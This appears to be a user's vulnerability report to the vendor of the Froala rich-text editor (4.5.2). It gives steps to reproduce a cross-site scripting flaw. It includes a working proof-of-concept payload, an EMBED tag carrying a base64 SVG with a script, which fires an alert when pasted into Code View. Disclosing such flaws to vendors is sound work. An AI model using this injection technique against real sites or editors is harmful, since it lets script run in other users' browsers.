Hello,

I've recently discovered a XSS security vulnerability while using the newest version of the Froala editor (4.5.2).

System:

• Windows: 11
• Chrome: 138.0.7204.50
• angular-froala-wysiwyg: 4.5.2

Steps to reproduce:

1. Open the basic JS Fiddle here
2. Click on the "Code View" icon to switch to code view

3. Copy in the below code:

<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>

4. Click the "Code View" button again to switch out of code view
5. You should see the popup of the XSS.

Let me know if there is anything we can do on our end to prevent these kinds of XSS issues, or whether a bugfix will be able to be released in an upcoming version.

The specific XSS payload I pulled from the list here. I believe that there may be other payloads that successfully work as well. I usually just copied a whole chunk of payloads into the Froala Code View editor and see what pops.